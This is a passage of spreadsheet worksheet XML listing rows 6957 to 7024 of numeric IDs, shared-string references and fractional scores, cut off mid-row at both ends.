      <c r="B6957" s="2">
        <v>7109005.0</v>
      </c>
      <c r="C6957" s="2" t="s">
        <v>6604</v>
      </c>
      <c r="D6957" s="2">
        <v>1.0</v>
      </c>
      <c r="E6957" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6957" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6958" ht="15.75" customHeight="1">
      <c r="A6958" s="1">
        <v>33464.0</v>
      </c>
      <c r="B6958" s="2">
        <v>7949095.0</v>
      </c>
      <c r="C6958" s="2" t="s">
        <v>6570</v>
      </c>
      <c r="D6958" s="2">
        <v>1.0</v>
      </c>
      <c r="E6958" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6958" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6959" ht="15.75" customHeight="1">
      <c r="A6959" s="1">
        <v>33635.0</v>
      </c>
      <c r="B6959" s="2">
        <v>8363693.0</v>
      </c>
      <c r="C6959" s="2" t="s">
        <v>6605</v>
      </c>
      <c r="D6959" s="2">
        <v>1.0</v>
      </c>
      <c r="E6959" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6959" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6960" ht="15.75" customHeight="1">
      <c r="A6960" s="1">
        <v>33837.0</v>
      </c>
      <c r="B6960" s="2">
        <v>9002794.0</v>
      </c>
      <c r="C6960" s="2" t="s">
        <v>6606</v>
      </c>
      <c r="D6960" s="2">
        <v>1.0</v>
      </c>
      <c r="E6960" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6960" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6961" ht="15.75" customHeight="1">
      <c r="A6961" s="1">
        <v>33919.0</v>
      </c>
      <c r="B6961" s="2">
        <v>9262318.0</v>
      </c>
      <c r="C6961" s="2" t="s">
        <v>6607</v>
      </c>
      <c r="D6961" s="2">
        <v>1.0</v>
      </c>
      <c r="E6961" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6961" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="6962" ht="15.75" customHeight="1">
      <c r="A6962" s="1">
        <v>3159.0</v>
      </c>
      <c r="B6962" s="2">
        <v>3.7012242E7</v>
      </c>
      <c r="C6962" s="2" t="s">
        <v>6608</v>
      </c>
      <c r="D6962" s="2">
        <v>1.0</v>
      </c>
      <c r="E6962" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6962" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6963" ht="15.75" customHeight="1">
      <c r="A6963" s="1">
        <v>4091.0</v>
      </c>
      <c r="B6963" s="2">
        <v>4.1250121E7</v>
      </c>
      <c r="C6963" s="2" t="s">
        <v>6609</v>
      </c>
      <c r="D6963" s="2">
        <v>1.0</v>
      </c>
      <c r="E6963" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6963" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6964" ht="15.75" customHeight="1">
      <c r="A6964" s="1">
        <v>7677.0</v>
      </c>
      <c r="B6964" s="2">
        <v>5.191851E7</v>
      </c>
      <c r="C6964" s="2" t="s">
        <v>6610</v>
      </c>
      <c r="D6964" s="2">
        <v>1.0</v>
      </c>
      <c r="E6964" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6964" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6965" ht="15.75" customHeight="1">
      <c r="A6965" s="1">
        <v>9894.0</v>
      </c>
      <c r="B6965" s="2">
        <v>5.6768541E7</v>
      </c>
      <c r="C6965" s="2" t="s">
        <v>6611</v>
      </c>
      <c r="D6965" s="2">
        <v>1.0</v>
      </c>
      <c r="E6965" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6965" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6966" ht="15.75" customHeight="1">
      <c r="A6966" s="1">
        <v>14487.0</v>
      </c>
      <c r="B6966" s="2">
        <v>3.9600941E7</v>
      </c>
      <c r="C6966" s="2" t="s">
        <v>6612</v>
      </c>
      <c r="D6966" s="2">
        <v>1.0</v>
      </c>
      <c r="E6966" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6966" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6967" ht="15.75" customHeight="1">
      <c r="A6967" s="1">
        <v>21660.0</v>
      </c>
      <c r="B6967" s="2">
        <v>2.4995343E7</v>
      </c>
      <c r="C6967" s="2" t="s">
        <v>6613</v>
      </c>
      <c r="D6967" s="2">
        <v>1.0</v>
      </c>
      <c r="E6967" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6967" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6968" ht="15.75" customHeight="1">
      <c r="A6968" s="1">
        <v>22864.0</v>
      </c>
      <c r="B6968" s="2">
        <v>4.7313138E7</v>
      </c>
      <c r="C6968" s="2" t="s">
        <v>6614</v>
      </c>
      <c r="D6968" s="2">
        <v>1.0</v>
      </c>
      <c r="E6968" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6968" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6969" ht="15.75" customHeight="1">
      <c r="A6969" s="1">
        <v>24658.0</v>
      </c>
      <c r="B6969" s="2">
        <v>1.1521815E7</v>
      </c>
      <c r="C6969" s="2" t="s">
        <v>6615</v>
      </c>
      <c r="D6969" s="2">
        <v>1.0</v>
      </c>
      <c r="E6969" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6969" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6970" ht="15.75" customHeight="1">
      <c r="A6970" s="1">
        <v>24721.0</v>
      </c>
      <c r="B6970" s="2">
        <v>1.1703303E7</v>
      </c>
      <c r="C6970" s="2" t="s">
        <v>6475</v>
      </c>
      <c r="D6970" s="2">
        <v>1.0</v>
      </c>
      <c r="E6970" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6970" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6971" ht="15.75" customHeight="1">
      <c r="A6971" s="1">
        <v>26180.0</v>
      </c>
      <c r="B6971" s="2">
        <v>1.6153138E7</v>
      </c>
      <c r="C6971" s="2" t="s">
        <v>6616</v>
      </c>
      <c r="D6971" s="2">
        <v>1.0</v>
      </c>
      <c r="E6971" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6971" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6972" ht="15.75" customHeight="1">
      <c r="A6972" s="1">
        <v>26540.0</v>
      </c>
      <c r="B6972" s="2">
        <v>1.7710399E7</v>
      </c>
      <c r="C6972" s="2" t="s">
        <v>6617</v>
      </c>
      <c r="D6972" s="2">
        <v>1.0</v>
      </c>
      <c r="E6972" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6972" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6973" ht="15.75" customHeight="1">
      <c r="A6973" s="1">
        <v>28216.0</v>
      </c>
      <c r="B6973" s="2">
        <v>2.5054796E7</v>
      </c>
      <c r="C6973" s="2" t="s">
        <v>6618</v>
      </c>
      <c r="D6973" s="2">
        <v>1.0</v>
      </c>
      <c r="E6973" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6973" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6974" ht="15.75" customHeight="1">
      <c r="A6974" s="1">
        <v>29071.0</v>
      </c>
      <c r="B6974" s="2">
        <v>3.0320592E7</v>
      </c>
      <c r="C6974" s="2" t="s">
        <v>6619</v>
      </c>
      <c r="D6974" s="2">
        <v>1.0</v>
      </c>
      <c r="E6974" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6974" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6975" ht="15.75" customHeight="1">
      <c r="A6975" s="1">
        <v>29687.0</v>
      </c>
      <c r="B6975" s="2">
        <v>3.4089018E7</v>
      </c>
      <c r="C6975" s="2" t="s">
        <v>6620</v>
      </c>
      <c r="D6975" s="2">
        <v>1.0</v>
      </c>
      <c r="E6975" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6975" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6976" ht="15.75" customHeight="1">
      <c r="A6976" s="1">
        <v>29955.0</v>
      </c>
      <c r="B6976" s="2">
        <v>3.6076646E7</v>
      </c>
      <c r="C6976" s="2" t="s">
        <v>6621</v>
      </c>
      <c r="D6976" s="2">
        <v>1.0</v>
      </c>
      <c r="E6976" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6976" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6977" ht="15.75" customHeight="1">
      <c r="A6977" s="1">
        <v>30085.0</v>
      </c>
      <c r="B6977" s="2">
        <v>3632558.0</v>
      </c>
      <c r="C6977" s="2" t="s">
        <v>6622</v>
      </c>
      <c r="D6977" s="2">
        <v>1.0</v>
      </c>
      <c r="E6977" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6977" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6978" ht="15.75" customHeight="1">
      <c r="A6978" s="1">
        <v>30305.0</v>
      </c>
      <c r="B6978" s="2">
        <v>3.793775E7</v>
      </c>
      <c r="C6978" s="2" t="s">
        <v>6623</v>
      </c>
      <c r="D6978" s="2">
        <v>1.0</v>
      </c>
      <c r="E6978" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6978" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6979" ht="15.75" customHeight="1">
      <c r="A6979" s="1">
        <v>30554.0</v>
      </c>
      <c r="B6979" s="2">
        <v>4.0680818E7</v>
      </c>
      <c r="C6979" s="2" t="s">
        <v>6624</v>
      </c>
      <c r="D6979" s="2">
        <v>1.0</v>
      </c>
      <c r="E6979" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6979" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6980" ht="15.75" customHeight="1">
      <c r="A6980" s="1">
        <v>32294.0</v>
      </c>
      <c r="B6980" s="2">
        <v>5.5491959E7</v>
      </c>
      <c r="C6980" s="2" t="s">
        <v>6625</v>
      </c>
      <c r="D6980" s="2">
        <v>1.0</v>
      </c>
      <c r="E6980" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6980" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6981" ht="15.75" customHeight="1">
      <c r="A6981" s="1">
        <v>32350.0</v>
      </c>
      <c r="B6981" s="2">
        <v>5591903.0</v>
      </c>
      <c r="C6981" s="2" t="s">
        <v>6626</v>
      </c>
      <c r="D6981" s="2">
        <v>1.0</v>
      </c>
      <c r="E6981" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6981" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="6982" ht="15.75" customHeight="1">
      <c r="A6982" s="1">
        <v>30829.0</v>
      </c>
      <c r="B6982" s="2">
        <v>4542744.0</v>
      </c>
      <c r="C6982" s="2" t="s">
        <v>6627</v>
      </c>
      <c r="D6982" s="2">
        <v>1.0</v>
      </c>
      <c r="E6982" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6982" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="6983" ht="15.75" customHeight="1">
      <c r="A6983" s="1">
        <v>10739.0</v>
      </c>
      <c r="B6983" s="2">
        <v>1.5372855E7</v>
      </c>
      <c r="C6983" s="2" t="s">
        <v>6628</v>
      </c>
      <c r="D6983" s="2">
        <v>1.0</v>
      </c>
      <c r="E6983" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6983" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="6984" ht="15.75" customHeight="1">
      <c r="A6984" s="1">
        <v>21866.0</v>
      </c>
      <c r="B6984" s="2">
        <v>2.741718E7</v>
      </c>
      <c r="C6984" s="2" t="s">
        <v>6629</v>
      </c>
      <c r="D6984" s="2">
        <v>1.0</v>
      </c>
      <c r="E6984" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6984" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="6985" ht="15.75" customHeight="1">
      <c r="A6985" s="1">
        <v>22832.0</v>
      </c>
      <c r="B6985" s="2">
        <v>4.6450289E7</v>
      </c>
      <c r="C6985" s="2" t="s">
        <v>6630</v>
      </c>
      <c r="D6985" s="2">
        <v>1.0</v>
      </c>
      <c r="E6985" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6985" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="6986" ht="15.75" customHeight="1">
      <c r="A6986" s="1">
        <v>28212.0</v>
      </c>
      <c r="B6986" s="2">
        <v>2.5052026E7</v>
      </c>
      <c r="C6986" s="2" t="s">
        <v>6631</v>
      </c>
      <c r="D6986" s="2">
        <v>1.0</v>
      </c>
      <c r="E6986" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6986" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="6987" ht="15.75" customHeight="1">
      <c r="A6987" s="1">
        <v>31721.0</v>
      </c>
      <c r="B6987" s="2">
        <v>5.211402E7</v>
      </c>
      <c r="C6987" s="2" t="s">
        <v>6632</v>
      </c>
      <c r="D6987" s="2">
        <v>1.0</v>
      </c>
      <c r="E6987" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6987" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="6988" ht="15.75" customHeight="1">
      <c r="A6988" s="1">
        <v>19972.0</v>
      </c>
      <c r="B6988" s="2">
        <v>5.7575288E7</v>
      </c>
      <c r="C6988" s="2" t="s">
        <v>6633</v>
      </c>
      <c r="D6988" s="2">
        <v>1.0</v>
      </c>
      <c r="E6988" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6988" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="6989" ht="15.75" customHeight="1">
      <c r="A6989" s="1">
        <v>21441.0</v>
      </c>
      <c r="B6989" s="2">
        <v>2.2394443E7</v>
      </c>
      <c r="C6989" s="2" t="s">
        <v>6634</v>
      </c>
      <c r="D6989" s="2">
        <v>1.0</v>
      </c>
      <c r="E6989" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6989" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="6990" ht="15.75" customHeight="1">
      <c r="A6990" s="1">
        <v>24845.0</v>
      </c>
      <c r="B6990" s="2">
        <v>1.218968E7</v>
      </c>
      <c r="C6990" s="2" t="s">
        <v>6635</v>
      </c>
      <c r="D6990" s="2">
        <v>1.0</v>
      </c>
      <c r="E6990" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6990" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="6991" ht="15.75" customHeight="1">
      <c r="A6991" s="1">
        <v>30513.0</v>
      </c>
      <c r="B6991" s="2">
        <v>4009633.0</v>
      </c>
      <c r="C6991" s="2" t="s">
        <v>6636</v>
      </c>
      <c r="D6991" s="2">
        <v>1.0</v>
      </c>
      <c r="E6991" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6991" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="6992" ht="15.75" customHeight="1">
      <c r="A6992" s="1">
        <v>33066.0</v>
      </c>
      <c r="B6992" s="2">
        <v>6839234.0</v>
      </c>
      <c r="C6992" s="2" t="s">
        <v>6637</v>
      </c>
      <c r="D6992" s="2">
        <v>1.0</v>
      </c>
      <c r="E6992" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6992" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="6993" ht="15.75" customHeight="1">
      <c r="A6993" s="1">
        <v>22302.0</v>
      </c>
      <c r="B6993" s="2">
        <v>3.3673805E7</v>
      </c>
      <c r="C6993" s="2" t="s">
        <v>6638</v>
      </c>
      <c r="D6993" s="2">
        <v>1.0</v>
      </c>
      <c r="E6993" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6993" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="6994" ht="15.75" customHeight="1">
      <c r="A6994" s="1">
        <v>22373.0</v>
      </c>
      <c r="B6994" s="2">
        <v>3.5019922E7</v>
      </c>
      <c r="C6994" s="2" t="s">
        <v>6639</v>
      </c>
      <c r="D6994" s="2">
        <v>1.0</v>
      </c>
      <c r="E6994" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6994" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="6995" ht="15.75" customHeight="1">
      <c r="A6995" s="1">
        <v>20790.0</v>
      </c>
      <c r="B6995" s="2">
        <v>1.5156911E7</v>
      </c>
      <c r="C6995" s="2" t="s">
        <v>6640</v>
      </c>
      <c r="D6995" s="2">
        <v>1.0</v>
      </c>
      <c r="E6995" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6995" s="2">
        <v>0.1085069444444444</v>
      </c>
    </row>
    <row r="6996" ht="15.75" customHeight="1">
      <c r="A6996" s="1">
        <v>24626.0</v>
      </c>
      <c r="B6996" s="2">
        <v>1.1462194E7</v>
      </c>
      <c r="C6996" s="2" t="s">
        <v>6641</v>
      </c>
      <c r="D6996" s="2">
        <v>1.0</v>
      </c>
      <c r="E6996" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6996" s="2">
        <v>0.1084229390681004</v>
      </c>
    </row>
    <row r="6997" ht="15.75" customHeight="1">
      <c r="A6997" s="1">
        <v>29538.0</v>
      </c>
      <c r="B6997" s="2">
        <v>3.283781E7</v>
      </c>
      <c r="C6997" s="2" t="s">
        <v>6642</v>
      </c>
      <c r="D6997" s="2">
        <v>1.0</v>
      </c>
      <c r="E6997" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6997" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="6998" ht="15.75" customHeight="1">
      <c r="A6998" s="1">
        <v>27305.0</v>
      </c>
      <c r="B6998" s="2">
        <v>2.1359977E7</v>
      </c>
      <c r="C6998" s="2" t="s">
        <v>6643</v>
      </c>
      <c r="D6998" s="2">
        <v>1.0</v>
      </c>
      <c r="E6998" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6998" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="6999" ht="15.75" customHeight="1">
      <c r="A6999" s="1">
        <v>27526.0</v>
      </c>
      <c r="B6999" s="2">
        <v>2.217118E7</v>
      </c>
      <c r="C6999" s="2" t="s">
        <v>6644</v>
      </c>
      <c r="D6999" s="2">
        <v>1.0</v>
      </c>
      <c r="E6999" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6999" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="7000" ht="15.75" customHeight="1">
      <c r="A7000" s="1">
        <v>28848.0</v>
      </c>
      <c r="B7000" s="2">
        <v>2.9012449E7</v>
      </c>
      <c r="C7000" s="2" t="s">
        <v>6505</v>
      </c>
      <c r="D7000" s="2">
        <v>1.0</v>
      </c>
      <c r="E7000" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7000" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="7001" ht="15.75" customHeight="1">
      <c r="A7001" s="1">
        <v>30418.0</v>
      </c>
      <c r="B7001" s="2">
        <v>3.8855981E7</v>
      </c>
      <c r="C7001" s="2" t="s">
        <v>6645</v>
      </c>
      <c r="D7001" s="2">
        <v>1.0</v>
      </c>
      <c r="E7001" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7001" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="7002" ht="15.75" customHeight="1">
      <c r="A7002" s="1">
        <v>12797.0</v>
      </c>
      <c r="B7002" s="2">
        <v>3.1409432E7</v>
      </c>
      <c r="C7002" s="2" t="s">
        <v>6646</v>
      </c>
      <c r="D7002" s="2">
        <v>1.0</v>
      </c>
      <c r="E7002" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7002" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="7003" ht="15.75" customHeight="1">
      <c r="A7003" s="1">
        <v>20424.0</v>
      </c>
      <c r="B7003" s="2">
        <v>1.2310393E7</v>
      </c>
      <c r="C7003" s="2" t="s">
        <v>6647</v>
      </c>
      <c r="D7003" s="2">
        <v>1.0</v>
      </c>
      <c r="E7003" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7003" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="7004" ht="15.75" customHeight="1">
      <c r="A7004" s="1">
        <v>22466.0</v>
      </c>
      <c r="B7004" s="2">
        <v>3.6636799E7</v>
      </c>
      <c r="C7004" s="2" t="s">
        <v>6648</v>
      </c>
      <c r="D7004" s="2">
        <v>1.0</v>
      </c>
      <c r="E7004" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7004" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="7005" ht="15.75" customHeight="1">
      <c r="A7005" s="1">
        <v>25203.0</v>
      </c>
      <c r="B7005" s="2">
        <v>1.3225298E7</v>
      </c>
      <c r="C7005" s="2" t="s">
        <v>6649</v>
      </c>
      <c r="D7005" s="2">
        <v>1.0</v>
      </c>
      <c r="E7005" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7005" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="7006" ht="15.75" customHeight="1">
      <c r="A7006" s="1">
        <v>949.0</v>
      </c>
      <c r="B7006" s="2">
        <v>2.2579337E7</v>
      </c>
      <c r="C7006" s="2" t="s">
        <v>6650</v>
      </c>
      <c r="D7006" s="2">
        <v>1.0</v>
      </c>
      <c r="E7006" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7006" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7007" ht="15.75" customHeight="1">
      <c r="A7007" s="1">
        <v>1547.0</v>
      </c>
      <c r="B7007" s="2">
        <v>2.75731E7</v>
      </c>
      <c r="C7007" s="2" t="s">
        <v>6651</v>
      </c>
      <c r="D7007" s="2">
        <v>1.0</v>
      </c>
      <c r="E7007" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7007" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7008" ht="15.75" customHeight="1">
      <c r="A7008" s="1">
        <v>5728.0</v>
      </c>
      <c r="B7008" s="2">
        <v>4.6603494E7</v>
      </c>
      <c r="C7008" s="2" t="s">
        <v>6652</v>
      </c>
      <c r="D7008" s="2">
        <v>1.0</v>
      </c>
      <c r="E7008" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7008" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7009" ht="15.75" customHeight="1">
      <c r="A7009" s="1">
        <v>6915.0</v>
      </c>
      <c r="B7009" s="2">
        <v>4.9850849E7</v>
      </c>
      <c r="C7009" s="2" t="s">
        <v>6653</v>
      </c>
      <c r="D7009" s="2">
        <v>1.0</v>
      </c>
      <c r="E7009" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7009" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7010" ht="15.75" customHeight="1">
      <c r="A7010" s="1">
        <v>8259.0</v>
      </c>
      <c r="B7010" s="2">
        <v>5.340628E7</v>
      </c>
      <c r="C7010" s="2" t="s">
        <v>6654</v>
      </c>
      <c r="D7010" s="2">
        <v>1.0</v>
      </c>
      <c r="E7010" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7010" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7011" ht="15.75" customHeight="1">
      <c r="A7011" s="1">
        <v>8858.0</v>
      </c>
      <c r="B7011" s="2">
        <v>5.4728193E7</v>
      </c>
      <c r="C7011" s="2" t="s">
        <v>6653</v>
      </c>
      <c r="D7011" s="2">
        <v>1.0</v>
      </c>
      <c r="E7011" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7011" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7012" ht="15.75" customHeight="1">
      <c r="A7012" s="1">
        <v>8885.0</v>
      </c>
      <c r="B7012" s="2">
        <v>5.4783401E7</v>
      </c>
      <c r="C7012" s="2" t="s">
        <v>6655</v>
      </c>
      <c r="D7012" s="2">
        <v>1.0</v>
      </c>
      <c r="E7012" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7012" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7013" ht="15.75" customHeight="1">
      <c r="A7013" s="1">
        <v>9173.0</v>
      </c>
      <c r="B7013" s="2">
        <v>5.5343291E7</v>
      </c>
      <c r="C7013" s="2" t="s">
        <v>6656</v>
      </c>
      <c r="D7013" s="2">
        <v>1.0</v>
      </c>
      <c r="E7013" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7013" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7014" ht="15.75" customHeight="1">
      <c r="A7014" s="1">
        <v>10132.0</v>
      </c>
      <c r="B7014" s="2">
        <v>5.7291192E7</v>
      </c>
      <c r="C7014" s="2" t="s">
        <v>6657</v>
      </c>
      <c r="D7014" s="2">
        <v>1.0</v>
      </c>
      <c r="E7014" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7014" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7015" ht="15.75" customHeight="1">
      <c r="A7015" s="1">
        <v>13438.0</v>
      </c>
      <c r="B7015" s="2">
        <v>3.510925E7</v>
      </c>
      <c r="C7015" s="2" t="s">
        <v>6658</v>
      </c>
      <c r="D7015" s="2">
        <v>1.0</v>
      </c>
      <c r="E7015" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7015" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7016" ht="15.75" customHeight="1">
      <c r="A7016" s="1">
        <v>14025.0</v>
      </c>
      <c r="B7016" s="2">
        <v>3.750169E7</v>
      </c>
      <c r="C7016" s="2" t="s">
        <v>6659</v>
      </c>
      <c r="D7016" s="2">
        <v>1.0</v>
      </c>
      <c r="E7016" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7016" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7017" ht="15.75" customHeight="1">
      <c r="A7017" s="1">
        <v>14930.0</v>
      </c>
      <c r="B7017" s="2">
        <v>4.1194182E7</v>
      </c>
      <c r="C7017" s="2" t="s">
        <v>6660</v>
      </c>
      <c r="D7017" s="2">
        <v>1.0</v>
      </c>
      <c r="E7017" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7017" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7018" ht="15.75" customHeight="1">
      <c r="A7018" s="1">
        <v>15469.0</v>
      </c>
      <c r="B7018" s="2">
        <v>4.3122655E7</v>
      </c>
      <c r="C7018" s="2" t="s">
        <v>6661</v>
      </c>
      <c r="D7018" s="2">
        <v>1.0</v>
      </c>
      <c r="E7018" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7018" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7019" ht="15.75" customHeight="1">
      <c r="A7019" s="1">
        <v>15861.0</v>
      </c>
      <c r="B7019" s="2">
        <v>4.4487424E7</v>
      </c>
      <c r="C7019" s="2" t="s">
        <v>6662</v>
      </c>
      <c r="D7019" s="2">
        <v>1.0</v>
      </c>
      <c r="E7019" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7019" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7020" ht="15.75" customHeight="1">
      <c r="A7020" s="1">
        <v>16979.0</v>
      </c>
      <c r="B7020" s="2">
        <v>4.8313394E7</v>
      </c>
      <c r="C7020" s="2" t="s">
        <v>6663</v>
      </c>
      <c r="D7020" s="2">
        <v>1.0</v>
      </c>
      <c r="E7020" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7020" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7021" ht="15.75" customHeight="1">
      <c r="A7021" s="1">
        <v>18036.0</v>
      </c>
      <c r="B7021" s="2">
        <v>5.153583E7</v>
      </c>
      <c r="C7021" s="2" t="s">
        <v>6664</v>
      </c>
      <c r="D7021" s="2">
        <v>1.0</v>
      </c>
      <c r="E7021" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7021" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7022" ht="15.75" customHeight="1">
      <c r="A7022" s="1">
        <v>18966.0</v>
      </c>
      <c r="B7022" s="2">
        <v>5.4356932E7</v>
      </c>
      <c r="C7022" s="2" t="s">
        <v>6665</v>
      </c>
      <c r="D7022" s="2">
        <v>1.0</v>
      </c>
      <c r="E7022" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7022" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7023" ht="15.75" customHeight="1">
      <c r="A7023" s="1">
        <v>19362.0</v>
      </c>
      <c r="B7023" s="2">
        <v>5.5464367E7</v>
      </c>
      <c r="C7023" s="2" t="s">
        <v>6666</v>
      </c>
      <c r="D7023" s="2">
        <v>1.0</v>
      </c>
      <c r="E7023" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7023" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="7024" ht="15.75" customHeight="1">
      <c r="A7024" s="1">
        <v>20597.0</v>
      </c>
      <c r="B7024" s="2">
        <v>1.3826071E7</v>
      </c>
      <c r="C7024" s="2" t="s">
